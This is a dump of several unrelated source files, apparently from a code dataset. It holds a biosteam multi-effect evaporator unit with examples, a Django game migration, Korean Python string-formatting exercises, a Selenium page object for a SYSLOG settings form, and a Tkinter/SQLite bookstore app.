recondensed. Cost is based on required heat transfer area. Vacuum system
is based on air leakage. Air leakage is based on volume, as given by
residence time `tau` and flow rate to each evaporator.
Parameters
----------
ins : stream
Inlet.
outs : stream sequence
* [0] Solid-rich stream.
* [1] Condensate stream.
P : tuple[float]
Pressures describing each evaporator (Pa).
V : float
Molar fraction evaporated as specified in `V_definition`
(either overall or in the first effect).
V_definition : str, optional
* 'Overall' - `V` is the overall molar fraction evaporated.
* 'First-effect' - `V` is the molar fraction evaporated in the first effect.
Examples
--------
Concentrate sugar setting vapor fraction at the first effect:
>>> import biosteam as bst
>>> from biorefineries.cornstover import chemicals
>>> bst.settings.set_thermo(chemicals)
>>> feed = bst.Stream('feed', Water=1000, Glucose=100,
... AceticAcid=0.5, HMF=0.1, Furfural=0.1,
... units='kg/hr')
>>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'),
... V=0.1, V_definition='First-effect',
... P=(101325, 73581, 50892, 32777, 20000))
>>> E1.simulate()
>>> E1.show()
MultiEffectEvaporator: E1
ins...
[0] feed
phase: 'l', T: 298.15 K, P: 101325 Pa
flow (kmol/hr): Water 55.5
AceticAcid 0.00833
Furfural 0.00104
HMF 0.000793
Glucose 0.555
outs...
[0] solids
phase: 'l', T: 333.24 K, P: 20000 Pa
flow (kmol/hr): Water 20.6
AceticAcid 0.00189
Furfural 7.39e-05
HMF 0.000793
Glucose 0.555
[1] liquid
phase: 'l', T: 352.12 K, P: 101325 Pa
flow (kmol/hr): Water 34.9
AceticAcid 0.00643
Furfural 0.000967
>>> E1.results()
Multi-Effect Evaporator Units E1
Power Rate kW 5.72
Cost USD/hr 0.447
Low pressure steam Duty kJ/hr 5.8e+05
Flow kmol/hr 14.9
Cost USD/hr 3.55
Cooling water Duty kJ/hr -3.49e+05
Flow kmol/hr 239
Cost USD/hr 0.116
Design Area m^2 11
Volume m^3 1.64
Purchase cost Condenser USD 5.35e+03
Evaporators USD 9.59e+03
Liquid-ring pump USD 1.24e+04
Total purchase cost USD 2.74e+04
Utility cost USD/hr 4.12
Concentrate sugar setting overall vapor fraction:
>>> import biosteam as bst
>>> from biorefineries.cornstover import chemicals
>>> bst.settings.set_thermo(chemicals)
>>> feed = bst.Stream('feed', Water=1000, Glucose=100,
... AceticAcid=0.5, HMF=0.1, Furfural=0.1,
... units='kg/hr')
>>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'),
... V=0.1, V_definition='Overall',
... P=(101325, 73581, 50892, 32777, 20000))
>>> E1.simulate()
>>> E1.show()
MultiEffectEvaporator: E1
ins...
[0] feed
phase: 'l', T: 298.15 K, P: 101325 Pa
flow (kmol/hr): Water 55.5
AceticAcid 0.00833
Furfural 0.00104
HMF 0.000793
Glucose 0.555
outs...
[0] solids
phase: 'l', T: 354.94 K, P: 50892 Pa
flow (kmol/hr): Water 50
AceticAcid 0.0069
Furfural 0.000579
HMF 0.000793
Glucose 0.555
[1] liquid
phase: 'l', T: 361.2 K, P: 101325 Pa
flow (kmol/hr): Water 5.55
AceticAcid 0.00143
Furfural 0.000462
>>> E1.results()
Multi-Effect Evaporator Units E1
Power Rate kW 5.72
Cost USD/hr 0.447
Low pressure steam Duty kJ/hr 3.82e+05
Flow kmol/hr 9.85
Cost USD/hr 2.34
Cooling water Duty kJ/hr -1.15e+05
Flow kmol/hr 78.5
Cost USD/hr 0.0383
Design Area m^2 1.64
Volume m^3 0.986
Purchase cost Condenser USD 3.89e+03
Evaporators USD 2.77e+03
Liquid-ring pump USD 1.24e+04
Total purchase cost USD 1.91e+04
Utility cost USD/hr 2.83
"""
line = 'Multi-Effect Evaporator'
_units = {'Area': 'm^2',
'Volume': 'm^3'}
_F_BM_default = {'Evaporators': 2.45,
'Liquid-ring pump': 1.0,
'Condenser': 3.17}
_N_outs = 2
_N_heat_utilities = 2
#: Residence time (hr)
tau = 0.30
# Evaporator type
_Type = 'Forced circulation'
# Data for simmulation and costing
_evap_data = evaporators[_Type]
@property
def Type(self):
"""Evaporation type."""
return self._Type
@Type.setter
def Type(self, evap_type):
try:
self._evap_data = evaporators[evap_type]
except KeyError:
dummy = str(evaporators.keys())[11:-2]
raise ValueError(f"Type must be one of the following: {dummy}")
self._Type = evap_type
@property
def V_definition(self):
"""[str] Must be one of the following:
* 'Overall' - Defines attribute `V` as the overall molar fraction evaporated.
* 'First-effect' - Defines attribute `V` as the molar fraction evaporated in the first effect.
"""
return self._V_definition
@V_definition.setter
def V_definition(self, V_definition):
V_definition = V_definition.capitalize()
if V_definition in ('Overall', 'First-effect'):
self._V_definition = V_definition
else:
raise ValueError("V_definition must be either 'Overall' or 'First-effect'")
def __init__(self, ID='', ins=None, outs=(), thermo=None, *, P, V, V_definition='Overall'):
Unit.__init__(self, ID, ins, outs, thermo)
self.P = P #: tuple[float] Pressures describing each evaporator (Pa).
self.V = V #: [float] Molar fraction evaporated.
self.V_definition = V_definition
self._V_first_effect = None
self._reload_components = True
self.components = {}
def reset_cache(self):
self._reload_components = True
def load_components(self):
P = self.P
thermo = self.thermo
# Create components
self._N_evap = n = len(P) # Number of evaporators
first_evaporator = Flash(None, outs=(None, None), P=P[0], thermo=thermo)
# Put liquid first, then vapor side stream
evaporators = [first_evaporator]
for i in range(1, n):
evap = Evaporator_PQ(None, outs=(None, None, None), P=P[i], Q=0, thermo=thermo)
evaporators.append(evap)
condenser = HXutility(None, outs=[None], thermo=thermo, V=0)
condenser.parent = self
self.heat_utilities = (first_evaporator.heat_utilities[0],
condenser.heat_utilities[0])
mixer = Mixer(None, outs=[None], thermo=thermo)
components = self.components
components['evaporators'] = evaporators
components['condenser'] = condenser
components['mixer'] = mixer
# Set-up components
other_evaporators = evaporators[1:]
first_evaporator.ins[:] = [i.copy() for i in self.ins]
# Put liquid first, then vapor side stream
ins = [first_evaporator.outs[1], first_evaporator.outs[0]]
for evap in other_evaporators:
evap.ins[:] = ins
ins = [evap.outs[1], evap.outs[0]]
def _V_overall(self, V_first_effect):
first_evaporator, *other_evaporators = self.components['evaporators']
first_evaporator.V = V_overall = V_first_effect
first_evaporator._run()
for evap in other_evaporators:
evap._run()
V_overall += (1. - V_overall) * evap.V
return V_overall
def _V_overall_objective_function(self, V_first_effect):
return self._V_overall(V_first_effect) - self.V
def _run(self):
out_wt_solids, liq = self.outs
ins = self.ins
if self.V == 0:
out_wt_solids.copy_like(ins[0])
for i in self.heat_utilities:
i.empty(); i.heat_exchanger = None
liq.empty()
self._reload_components = True
return
if self._reload_components:
self.load_components()
self._reload_components = False
if self.V_definition == 'Overall':
P = tuple(self.P)
self.P = list(P)
for i in range(self._N_evap-1):
if self._V_overall(0.) > self.V:
self.P.pop()
self.load_components()
self._reload_components = True
else:
break
self.P = P
self._V_first_effect = flx.IQ_interpolation(self._V_overall_objective_function,
0., 1., None, None, self._V_first_effect,
xtol=1e-9, ytol=1e-6,
checkiter=False)
V_overall = self.V
else:
V_overall = self._V_overall(self.V)
n = self._N_evap # Number of evaporators
components = self.components
evaporators = components['evaporators']
condenser = components['condenser']
mixer = components['mixer']
last_evaporator = evaporators[-1]
        # Condense the vapor from the last effect
outs_vap = last_evaporator.outs[0]
condenser.ins[:] = [outs_vap]
condenser._run()
outs_liq = [condenser.outs[0]] # list containing all output liquids
# Unpack other output streams
out_wt_solids.copy_like(last_evaporator.outs[1])
for i in range(1, n):
evap = evaporators[i]
outs_liq.append(evap.outs[2])
# Mix liquid streams
mixer.ins[:] = outs_liq
mixer._run()
liq.copy_like(mixer.outs[0])
mixed_stream = MultiStream(None, thermo=self.thermo)
mixed_stream.copy_flow(self.ins[0])
mixed_stream.vle(P=last_evaporator.P, V=V_overall)
out_wt_solids.mol = mixed_stream.imol['l']
liq.mol = mixed_stream.imol['g']
def _design(self):
if self.V == 0: return
# This functions also finds the cost
A_range, C_func, U, _ = self._evap_data
components = self.components
evaporators = components['evaporators']
Design = self.design_results
Cost = self.baseline_purchase_costs
CE = bst.CE
first_evaporator = evaporators[0]
heat_exchanger = first_evaporator.heat_exchanger
hu = heat_exchanger.heat_utilities[0]
duty = first_evaporator.H_out - first_evaporator.H_in
Q = abs(duty)
Tci = first_evaporator.ins[0].T
Tco = first_evaporator.outs[0].T
hu(duty, Tci, Tco)
Th = hu.inlet_utility_stream.T
LMTD = ht.compute_LMTD(Th, Th, Tci, Tco)
ft = 1
A = abs(compute_heat_transfer_area(LMTD, U, Q, ft))
first_evaporator.baseline_purchase_costs['Evaporator'] = C = C_func(A, CE)
self._evap_costs = evap_costs = [C]
# Find condenser requirements
condenser = components['condenser']
condenser._summary()
Cost['Condenser'] = condenser.purchase_cost
# Find area and cost of evaporators
As = [A]
A_min, A_max = A_range
evap = evaporators[-1]
for evap in evaporators[1:]:
Q = evap.design_results['Heat transfer']
if Q <= 1e-12:
As.append(0.)
evap_costs.append(0.)
else:
Tc = evap.outs[0].T
Th = evap.outs[2].T
LMTD = Th - Tc
A = compute_heat_transfer_area(LMTD, U, Q, 1.)
As.append(A)
if settings.debug and not A_min < A < A_max:
warn(f'area requirement ({A}) is out of range, {A_range}')
evap_costs.append(C_func(A, CE))
self._As = As
Design['Area'] = A = sum(As)
Design['Volume'] = total_volume = self._N_evap * self.tau * self.ins[0].F_vol
Cost['Evaporators'] = sum(evap_costs)
# Calculate power
power, cost = compute_vacuum_system_power_and_cost(
F_mass=0, F_vol=0, P_suction=evap.outs[0].P,
vessel_volume=total_volume,
vacuum_system_preference='Liquid-ring pump')
Cost['Liquid-ring pump'] = cost
self.power_utility(power)
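# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): how this unit is
# typically wired up, assuming the enclosing class is biosteam's
# MultiEffectEvaporator, as the docstring and `line` attribute suggest. The
# chemicals, flows, and pressure ladder below are illustrative assumptions.
#
# import biosteam as bst
# bst.settings.set_thermo(['Water', 'Ethanol'])
# feed = bst.Stream('feed', Water=1000, Ethanol=10, units='kg/hr')
# E1 = MultiEffectEvaporator('E1', ins=feed, outs=('concentrate', 'condensate'),
#                            V=0.5, V_definition='Overall',
#                            P=(101325, 73581, 50892))
# E1.simulate()
# E1.results()  # prints a utility/design/cost table like the one in the docstring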
|
[
"[email protected]"
] | |
859652d89a14584f5e955cc3ad819c804f555e3b
|
5bfca95abf14f7bb0ff29b58b018fc9062d3f837
|
/apps/first_draft/migrations/0001_initial.py
|
ac8c2856ce7f990fcbd46afa84be29c6e4323981
|
[] |
no_license
|
wdudek82/django-ogame-clone
|
621afb20ea2dd3c0f2e4b93dfdd604e0628bd7b8
|
472971da826d078176a5d619b3b5cad89e3d1c5c
|
refs/heads/master
| 2021-09-08T15:19:49.407650 | 2017-11-26T19:14:48 | 2017-11-26T19:14:48 | 124,670,158 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,675 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-15 20:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Building',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True)),
('base_cost', models.PositiveIntegerField()),
],
),
migrations.CreateModel(
name='PlayerBuilding',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.PositiveIntegerField(default=0)),
('acceleration', models.PositiveIntegerField(choices=[(1, 0), (2, 1), (3, 2), (4, 3), (5, 4), (6, 5), (7, 6), (8, 7), (9, 8), (10, 9), (11, 10), (12, 11), (13, 12), (14, 13), (15, 14), (16, 15), (17, 16), (18, 17), (19, 18), (20, 19), (21, 20), (22, 21), (23, 22), (24, 23), (25, 24), (26, 25), (27, 26), (28, 27), (29, 28), (30, 29), (31, 30), (32, 31), (33, 32), (34, 33), (35, 34), (36, 35), (37, 36), (38, 37), (39, 38), (40, 39), (41, 40), (42, 41), (43, 42), (44, 43), (45, 44), (46, 45), (47, 46), (48, 47), (49, 48), (50, 49), (51, 50), (52, 51), (53, 52), (54, 53), (55, 54), (56, 55), (57, 56), (58, 57), (59, 58), (60, 59), (61, 60), (62, 61), (63, 62), (64, 63), (65, 64), (66, 65), (67, 66), (68, 67), (69, 68), (70, 69), (71, 70), (72, 71), (73, 72), (74, 73), (75, 74), (76, 75), (77, 76), (78, 77), (79, 78), (80, 79), (81, 80), (82, 81), (83, 82), (84, 83), (85, 84), (86, 85), (87, 86), (88, 87), (89, 88), (90, 89), (91, 90), (92, 91), (93, 92), (94, 93), (95, 94), (96, 95), (97, 96), (98, 97), (99, 98), (100, 99), (101, 100)])),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('building', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Building')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PlayerResouce',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.PositiveIntegerField(default=0)),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Resources',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name_plural': 'Resources',
},
),
migrations.AddField(
model_name='playerresouce',
name='resource',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Resources'),
),
migrations.AlterUniqueTogether(
name='playerbuilding',
unique_together=set([('player', 'building')]),
),
]
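# ---------------------------------------------------------------------------
# Hedged sketch (not part of the generated migration): roughly the models.py
# that would produce the operations above. Field names, types, and options are
# read straight from the migration; the module layout and anything else is an
# assumption.
#
# from django.conf import settings
# from django.db import models
#
# class Building(models.Model):
#     name = models.CharField(max_length=255, unique=True)
#     base_cost = models.PositiveIntegerField()
#
# class PlayerBuilding(models.Model):
#     player = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
#     building = models.ForeignKey('Building', on_delete=models.CASCADE)
#     level = models.PositiveIntegerField(default=0)
#     acceleration = models.PositiveIntegerField(choices=[(i + 1, i) for i in range(101)])
#     created_at = models.DateTimeField(auto_now_add=True)
#     updated_at = models.DateTimeField(auto_now=True)
#
#     class Meta:
#         unique_together = (('player', 'building'),)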
|
[
"[email protected]"
] | |
8ad2bcbe89aa890553ba807bcca337ba1fcecfa0
|
50e4a9f7d2126d0bee1b97126e9a60de7314ccce
|
/iot/chapter3/ex08-03.py
|
7beb00abdc05afdf5bc8438b56a9a5a28e4d2f39
|
[] |
no_license
|
heohyoyeong/test_python_basic
|
649d5a0ed671a883885c52033a24362149435114
|
1ef9583e7e1bd735c15b0f6af57f39809b041403
|
refs/heads/master
| 2022-11-21T09:13:08.632555 | 2020-07-29T02:21:11 | 2020-07-29T02:21:11 | 283,376,126 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,047 |
py
|
def main():
s= "독도는 일본땅. 대마도도 일본땅"
print(s)
print(s.replace("일본","한국"))
print(s)
def main2():
message="안녕하세요"
print(message.center(30))
print(message.ljust(30))
print(message.rjust(30))
def main3():
trabler = """
강나루 거너서
밀밭 길을
구름에 달 가듯이
가는 나그네
"""
poet= trabler.splitlines()
for line in poet:
print(line.center(30))
def main4():
price= 500
print("궁금하면" + str(price)+ "원!")
mon=8
day=15
anni="광복절"
print("%d월 %d일은 %s이다."%(mon,day,anni))
def main5():
value=123
print("###%d###"%value)
print("###%5d###" % value)
print("###%10d###" % value)
print("###%-10d###" % value)
print("###%1d###" % value)
def main6():
    price = [30, 13500, 2000]
    for p in price:
        print("가격 : %d원" % p)
    print()
    for p in price:
        print("가격 : %7d원" % p)
    print()
    for p in price:
        print("가격 : %-7d원" % p)
    print()
def main7():
f=123.1234567
print("%10f" % f)
print("%10.8f" % f)
print("%10.5f" % f)
print("%10.2f" % f)
print("%.2f" % 123.126)
def main8():
name= "한결"
age=16
height= 178.8
print("이름:{}, 나이: {}, 키: {}".format(name,age,height))
print("이름:{:s}, 나이: {:d}, 키: {:f}".format(name, age, height))
print("이름:{:4s}, 나이: {:3d}, 키: {:.2f}".format(name, age, height))
def main9():
name = "한결"
age = 16
height = 162.5
print("이름:{0}, 나이: {1}, 키: {2}".format(name, age, height))
print("이름:{2}, 나이: {1}, 키: {0}".format(height, age, name))
print("이름:{name}, 나이: {age}, 키: {height}".format(age=20, height=160.9,name="길동"))
def main10():
name="한결"
age= 16
height= 162.5
print(f"이름: {name}, 나이:{age}, 키:{height:.2f}")
# main()
# main2()
# main3()
# main4()
# main5()
# main6()
# main7()
# main8()
# main9()
# main10()
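# ---------------------------------------------------------------------------
# Hedged summary (not part of the original exercises): the three formatting
# styles demonstrated above, side by side on the same values.
#
# name, age = "한결", 16
# print("이름: %s, 나이: %d" % (name, age))       # printf-style (main4-main7)
# print("이름: {}, 나이: {}".format(name, age))   # str.format (main8-main9)
# print(f"이름: {name}, 나이: {age}")             # f-string, Python 3.6+ (main10)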
|
[
"[email protected]"
] | |
1a72065a811121f0dd9d16e8dd072b751fba6a6a
|
917a99fdf14097dd8001b5c98cc48c8716f8f969
|
/webElement/ass_service/syslogElement.py
|
8bffc624415e17423f022ce3b8b9a646794ed0be
|
[] |
no_license
|
isomper/testIsomptySecret
|
722eba4cbefe9495a3292d8d10e8ad9c4a34c8a7
|
968bbee05af730cfb7717f1531286f11a7f99cf3
|
refs/heads/master
| 2020-03-19T07:29:28.487913 | 2018-07-13T06:25:50 | 2018-07-13T06:25:50 | 136,118,583 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,408 |
py
|
#coding=utf-8
u'''
# File name:
# Version of software under test: V2.8.1
# Author: 李择优
# Created: 2018/1/24
# Module description: SYSLOG
# Change history
# Modified by:
# Modified on:
# Changes:
'''
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
sys.path.append("/testIsompSecret/common/")
from _icommon import getElement,selectElement,frameElement,commonFun
from _cnEncode import cnEncode
from _log import log
sys.path.append("/testIsompSecret/webElement/ass_service/")
from ntpElement import NtpService
class Syslog:
    # Running-status toggle
    SWITCH = "btn_qh"
    # IP address
    HOST = "host"
    # Port
    PORT = "port"
    # Protocol
    PROTOCOL = "protocol"
    # Ident
    IDENT = "ident"
    # Facility
    FACILITY = "facility"
    # Test button
    TEST_BUTTON = "test_syslog"
    # Save button
    SAVE_BUTTON = "save_syslog"
def __init__(self,driver):
self.driver = driver
self.log = log()
self.getElem = getElement(driver)
self.select = selectElement(driver)
self.frameElem = frameElement(driver)
self.cmf = commonFun(driver)
self.ntp = NtpService(driver)
self.cnEnde = cnEncode()
    u'''Fill a text field with the given value.
    parameters:
        var_text : the text to enter
        value    : the locator value (element id)
    '''
    def set_common_func(self, var_text, value):
        try:
            revar_text = self.cnEnde.is_float(var_text)
            var_elem = self.getElem.find_element_with_wait_EC("id", value)
            var_elem.clear()
            var_elem.send_keys(revar_text)
        except Exception as e:
            # revar_text may be unbound if is_float raised, so report var_text.
            print("set user common text error: " + str(var_text) + " " + str(e))
    u'''Enter the IP address.
    parameters:
        setIp : IP address
    '''
def set_ip(self,setIp):
return self.set_common_func(setIp,self.HOST)
    u'''Enter the port.
    parameters:
        setPort : port number
    '''
def set_port(self,setPort):
return self.set_common_func(setPort,self.PORT)
    u'''Select the protocol.
    Parameters:
        value : the value attribute of the select option; "udp" for UDP,
                "tcp" for TCP, "nix_syslog" for nix_syslog
    '''
def set_protocol(self, value):
valu = self.cnEnde.is_float(value)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
selem = self.getElem.find_element_with_wait_EC("id",self.PROTOCOL)
self.select.select_element_by_value(selem, valu)
    u'''Enter the ident string.
    parameters:
        setIdent : ident string
    '''
def set_ident(self,setIdent):
return self.set_common_func(setIdent,self.IDENT)
    u'''Select the facility.
    Parameters:
        value : the value attribute of the select option; 32 stands for facility
    '''
def set_facility(self, value):
valu = self.cnEnde.is_float(value)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
selem = self.getElem.find_element_with_wait_EC("id",self.FACILITY)
self.select.select_element_by_value(selem, valu)
    u'''Click the Test button.'''
def test_button(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
self.getElem.find_element_wait_and_click_EC("id",self.TEST_BUTTON)
    u'''Click the Save button.'''
def save_button(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
self.getElem.find_element_wait_and_click_EC("id",self.SAVE_BUTTON)
    u'''Toggle the switch state.'''
def change_switch_status(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
try:
button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH)
class_attr = button_elem.get_attribute("class")
off_status = "switch_off"
on_status = "switch_on"
if class_attr == on_status:
self.ntp.click_left_moudle(1)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH)
time.sleep(1)
button_elem.click()
button_elem.click()
else:
button_elem.click()
        except Exception as e:
            print("Change button status error: " + str(e))
|
[
"[email protected]"
] | |
65491b4cf6af511302a7fd9c889aaa1981d32a99
|
69f313e9f97dd50856be74f0f5a13ffad4fc2373
|
/LibraryFront.py
|
122cf64f7ed6bb854b053ef54e3c2fee03472a28
|
[] |
no_license
|
akimbaev/Python_tkinter
|
f2b9e57601fa068aff71c87be2c861124f48972f
|
5bf5facc9eb40fb6e8301aa75078b8e53ff50d2d
|
refs/heads/master
| 2022-11-15T00:16:27.576341 | 2020-06-30T14:25:37 | 2020-06-30T14:25:37 | 273,231,482 | 0 | 2 | null | 2020-06-26T15:30:17 | 2020-06-18T12:26:08 |
Python
|
UTF-8
|
Python
| false | false | 9,760 |
py
|
from tkinter import *
from LibraryBackend import Database
import os.path
import tkinter as tk
import tkinter.ttk as ttk
import matplotlib
import pylab
matplotlib.use("TkAgg")
# from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
import pylab as pl
import sqlite3
database = Database("books.db")
# with sqlite3.connect('books.db') as conn:
# cur = conn.cursor()
from models.Item import Item
conn = sqlite3.connect("books.db")
cur = conn.cursor()
from models.Store import Store
from models.ShoppingCart import ShoppingCart
cart = ShoppingCart()
class Window(object):
class_var = 1
updated_list=[]
def __init__(self,window):
self.window = window
self.window.wm_title("The Book Store")
l1 = Label(window, text="Title")
l1.grid(row=0, column=0)
l2 = Label(window, text="Author")
l2.grid(row=0, column=2)
l3 = Label(window, text="Year")
l3.grid(row=1, column=0)
l4 = Label(window, text="ISBN")
l4.grid(row=1, column=2)
self.title_text = StringVar()
self.e1 = Entry(window, textvariable=self.title_text)
self.e1.grid(row=0, column=1)
self.author_text = StringVar()
self.e2 = Entry(window, textvariable=self.author_text)
self.e2.grid(row=0, column=3)
self.year_text = StringVar()
self.e3 = Entry(window, textvariable=self.year_text)
self.e3.grid(row=1, column=1)
self.ISBN_text = StringVar()
self.e4= Entry(window, textvariable=self.ISBN_text)
self.e4.grid(row=1, column=3)
self.list1 = Listbox(window, height=6, width=35)
self.list1.grid(row=2, column=0, rowspan=6, columnspan=2,padx=5)
self.list1.bind('<<ListboxSelect>>', self.get_selected_row)
# now we need to attach a scrollbar to the listbox, and the other direction,too
sb1 = Scrollbar(window)
sb1.grid(row=2, column=2, rowspan=6)
self.list1.config(yscrollcommand=sb1.set)
sb1.config(command=self.list1.yview)
b1 = Button(window, text="View all", width=12, command=self.view_command)
b1.grid(row=2, column=3)
b2 = Button(window, text="Search entry", width=12, command=self.search_command)
b2.grid(row=3, column=3)
b3 = Button(window, text="Add entry", width=12, command=self.add_command)
b3.grid(row=4, column=3)
b4 = Button(window, text="Update selected", width=12, command=self.update_command)
b4.grid(row=5, column=3)
b5 = Button(window, text="Delete selected", width=12, command=self.delete_command)
b5.grid(row=6, column=3)
# b6 = Button(window, text="Top searched", width=12, command=self.animate)
# b6.grid(row=7, column=3)
b6 = Button(window, text="Top searched", width=12, command=self.animate)
b6.grid(row=7, column=3)
b7 = Button(window, text="Close", width=12, command=window.destroy)
b7.grid(row=8, column=3)
b8 = Button(window, text="Add to cart ", width=12, cursor="hand2", command=self.addItemToCart)
b8.grid(row=9, column=0)
b9 = Button(window, text="Go to cart ", width=12, command=self.viewCart)
b9.grid(row=9, column=1)
def viewCart(self):
cartWindow = Toplevel()
cartWindow.title("The Cart")
cartWindow.grab_set()
global cart
cartItems = cart.getCartItems()
cartItemsLabelFrame = LabelFrame(cartWindow,text="Cart Items")
cartItemsLabelFrame.pack(fill="both", expand="yes", padx="20", pady="10")
cartItemsFrame = Frame(cartItemsLabelFrame, padx=3, pady=3)
cartItemsFrame.pack()
index = 0
for item in cartItems:
itemFrame = Frame(cartItemsFrame, pady="5")
itemFrame.pack(fill="both", expand="yes")
nameLabel = Label(itemFrame, text=item.name,font=("Candara",15),fg="blue")
priceLabel = Label(itemFrame, text="$ %s"%item.price,font=("Candara",13),fg="red")
addToCartBtn = Button(itemFrame, text="Remove From Cart", font=("Candara",11,"bold"),fg="red",bg="white",cursor="hand2", command=lambda i=index: removeFromCart(i,cartWindow) )
nameLabel.pack(side="left")
priceLabel.pack(side="left")
addToCartBtn.pack(side="right" )
index += 1
checkOutFrame = Frame(cartWindow, pady="10")
totalPriceLabel = Label(checkOutFrame, text="Total Price : $ %s" % cart.getTotalPrice(), font=("Candara",14,"bold"))
totalPriceLabel.pack(side="left")
buyBtn = Button(checkOutFrame, text="Buy Now", font=("Candara",15,"bold"),bg="white",cursor="hand2", command=lambda : buyCommand(cartWindow))
buyBtn.pack(side="left",padx="10")
checkOutFrame.pack()
backToStoreBtn = Button(cartWindow, text="Back To Store", font=("Candara",15,"bold"),bg="white",cursor="hand2",command=cartWindow.destroy)
backToStoreBtn.pack(pady="6")
cartWindow.mainloop()
def addItemToCart(self):
name1=self.title_text.get()
store = Store()
from models.Item import Item
Item.name=name1
Item.price=100
cart.addToCart(Item)
# messagebox.showinfo(title="Success" , message="Item %s Added To The Cart !!"%item.name )
    def get_selected_row(self, event):  # the "event" parameter is needed because we've bound this function to the listbox
try:
index = self.list1.curselection()[0]
self.selected_tuple = self.list1.get(index)
self.e1.delete(0,END)
self.e1.insert(END,self.selected_tuple[1])
self.e2.delete(0, END)
self.e2.insert(END,self.selected_tuple[2])
self.e3.delete(0, END)
self.e3.insert(END,self.selected_tuple[3])
self.e4.delete(0, END)
self.e4.insert(END,self.selected_tuple[4])
except IndexError:
pass #in the case where the listbox is empty, the code will not execute
def view_command(self):
self.list1.delete(0, END) # make sure we've cleared all entries in the listbox every time we press the View all button
for row in database.view():
self.list1.insert(END, row)
def set_const(self, new_var):
Window.class_var = new_var
def get_const(self):
return Window.class_var
def set_new_list(self, new_list):
Window.updated_list = new_list
def get_updated_list(self):
return Window.updated_list
def animate(self):
try:
val = self.get_updated_list()
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, val)
cur.execute("SELECT COUNT(DISTINCT title) FROM top_book;")
num_of_books = cur.fetchall()
dist_books = num_of_books[0][0]
xs = []
x_book_name=[]
ys = []
cur.execute("SELECT title from top_book")
for i in range(dist_books):
xs.append(i)
for i in range(dist_books):
one_book=cur.fetchone()
x_book_name.append(one_book[0])
cur.execute("SELECT counter from top_book")
for i in range(dist_books):
one_book_occur=cur.fetchone()
ys.append(one_book_occur[0])
#Type1
plt.figure(figsize=(8,6))
plt.suptitle('Categorical Plotting')
plt.style.use('ggplot')
plt.plot(x_book_name, ys)
plt.xticks(rotation=15)
conn.commit()
plt.show()
conn.commit()
conn.close()
        except Exception:
            print("No data is chosen for building a graph")
            conn.commit()
            conn.close()
def search_command(self):
self.list1.delete(0, END)
for row in database.search(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()):
self.list1.insert(END, row)
cur.execute("SELECT title FROM book")
var = cur.fetchall()
new_table=[]
rrr = self.get_updated_list()
if (len(rrr) == 0) :
cur.execute("CREATE TABLE IF NOT EXISTS top_book (title VARCHAR(255), counter INTEGER);")
get_title = [i[0] for i in var]
get_counter = []
for i in range(len(get_title)):
if(get_title[i] == self.title_text.get()):
get_counter.append(1)
else:
get_counter.append(0)
val = list(zip(get_title, get_counter))
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, val)
cur.execute('SELECT * FROM top_book')
self.set_new_list(cur.fetchall())
print("came here")
conn.commit()
new_table = self.get_updated_list()
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, list(set(new_table)))
cur.execute("SELECT max(counter) FROM top_book WHERE title=?", (self.title_text.get(), ))
to_increment = cur.fetchall()[0][0]
cur.execute("""UPDATE top_book
SET counter = counter + 1
WHERE title = ? and counter=?""", (self.title_text.get(),to_increment))
cur.execute("SELECT * FROM top_book")
list_to_save = cur.fetchall()
self.set_new_list(list(set(list_to_save)))
print(list(set(list_to_save)))
        conn.commit()
        # Keep the shared connection open here: animate() still needs it.
        return list(set(list_to_save))
def add_command(self):
database.insert(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get())
self.list1.delete(0, END)
self.list1.insert(END, (self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()))
def delete_command(self):
database.delete(self.selected_tuple[0])
self.view_command()
def update_command(self):
#be careful for the next line ---> we are updating using the texts in the entries, not the selected tuple
